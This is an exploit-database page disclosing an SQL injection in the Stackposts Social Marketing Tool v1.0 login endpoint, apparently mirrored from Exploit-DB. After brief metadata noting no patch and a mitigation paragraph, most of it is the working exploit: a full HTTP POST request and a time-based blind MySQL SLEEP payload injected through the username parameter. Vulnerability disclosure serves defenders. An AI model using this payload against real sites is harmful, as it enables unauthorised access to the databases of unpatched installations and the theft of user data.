Stackposts Social Marketing Tool v1.0 - SQL Injection

vendor:

Stackposts Social Marketing Tool

by:

Ahmet Ümit BAYRAM

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Stackposts Social Marketing Tool

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:stackposts_social_marketing_tool:1.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2023

Stackposts Social Marketing Tool v1.0 – SQL Injection

The Stackposts Social Marketing Tool v1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input before executing database queries. They should also use prepared statements or parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
# Demo Site: https://demo.stackposts.com
# Tested on: Kali Linux
# CVE: N/A


### Request ###

POST /spmo/auth/login HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://localhost/spmo/
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 104
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*


### Parameter & Payloads ###

Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1')
AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg